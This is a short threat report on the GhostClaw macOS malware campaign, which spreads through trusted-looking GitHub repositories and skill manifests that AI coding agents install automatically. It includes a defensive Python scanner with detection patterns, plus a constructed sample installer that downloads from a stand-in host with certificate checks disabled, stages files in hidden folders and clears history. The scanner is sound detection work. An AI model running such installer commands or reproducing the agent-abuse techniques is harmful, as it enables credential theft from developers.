GhostClaw, also known as Ghost loader, is a growing malware campaign targeting macOS. This article explores this sneaky threat. The infection follows a multi-step process designed to gain access to, and steal, macOS credentials.

Attackers use repositories containing manifest files built for platforms where AI coding agents can automatically discover and install external skills. GhostClaw is a very sneaky threat to developer environments because it combines anti-forensic techniques with abuse of native macOS tools. The core of the program is a setup script designed to trick victims. The malware deletes its temporary files so that it can persist unnoticed for a long time.

It moves into hidden folders that look like normal developer activity. Once installation is complete, a script runs to clear the terminal of any trace of the attack. It also installs global packages so that its activity blends in even more closely with normal system operations.

The threat has since grown. Threat actors are actively using malicious GitHub repositories to spread the malware, expanding the attack surface to include both developers and automated AI workflows. These repositories pose as legitimate developer tools, trading bots, and software development kits.

Attackers build trust by populating the repositories with harmless code and manufacturing fake engagement, such as hundreds of repository stars. They then quietly add malicious code. This gives the attacker entry through both direct user interaction and automated AI agent workflows, completely bypassing the usual package manager protections. The download step disables certificate verification by using an insecure flag, which weakens transport security.
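The installer behaviours described above (a download with certificate checks disabled, cleanup of temporary files, staging into hidden folders, global package installs and terminal clearing) can be flagged before a setup script from a third-party repository or skill manifest is ever run. The following scanner is an added example, not code from the article or from any referenced research; its regex rules and the sample script it scans are constructed assumptions, not indicators taken from the GhostClaw campaign.

```python
"""Heuristic scanner for setup/install scripts pulled in from third-party repositories.
Flags the behaviours the GhostClaw write-up describes: downloads with certificate
checks disabled, terminal/history clearing, cleanup of temporary files, staging into
hidden directories and global package installs. Rules and sample are constructed."""
import re

# Each rule: (finding name, regex). The patterns are assumptions, not IoCs from the page.
RULES = [
    ("insecure_download",
     re.compile(r"\b(curl|wget)\b[^\n|;&]*(\s-k\b|--insecure|--no-check-certificate)")),
    ("terminal_clear",
     re.compile(r"(^|[;&|]\s*)(clear|reset|history\s+-c)\b", re.M)),
    ("temp_cleanup",
     re.compile(r"\brm\s+-[a-zA-Z]*f[a-zA-Z]*\s+[^\n;&|]*(/tmp/|\$TMPDIR|/var/tmp)")),
    ("hidden_dir_staging",
     re.compile(r"\b(mkdir|cp|mv)\b[^\n;&|]*(\$HOME|~)/\.[A-Za-z0-9_.-]+")),
    ("global_package_install",
     re.compile(r"\b(npm|pnpm|yarn)\s+(install|add|i)\b[^\n;&|]*(\s-g\b|--global)")),
]

def scan_script(text: str) -> dict:
    """Return {finding_name: [line numbers]} for every rule that fires."""
    findings = {}
    for lineno, line in enumerate(text.splitlines(), start=1):
        for name, pattern in RULES:
            if pattern.search(line):
                findings.setdefault(name, []).append(lineno)
    return findings

def risk_score(findings: dict) -> int:
    """Crude score: one point per distinct behaviour, two for an insecure download."""
    return sum(2 if name == "insecure_download" else 1 for name in findings)

# Constructed sample resembling the staged install flow described in the article.
SAMPLE_SCRIPT = """#!/bin/bash
set -e
curl -k -sL https://example.invalid/bootstrap.tar.gz -o /tmp/bootstrap.tar.gz
mkdir -p "$HOME/.cache/devtools"
tar -xzf /tmp/bootstrap.tar.gz -C "$HOME/.cache/devtools"
npm install -g some-helper-package
rm -rf /tmp/bootstrap.tar.gz
history -c; clear
"""

if __name__ == "__main__":
    result = scan_script(SAMPLE_SCRIPT)
    for name, lines in sorted(result.items()):
        print(f"{name}: lines {lines}")
    print("risk score:", risk_score(result))
```

Running the scanner against every install script an AI agent is about to execute, and blocking anything that scores above a threshold, gives a cheap gate that does not depend on knowing the campaign's specific files or hashes.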

Execution then moves on to heavily obfuscated JavaScript payloads.

The malware validates the stolen credentials and then connects to a remote command-and-control server to retrieve a jamf-encrypted secondary payload.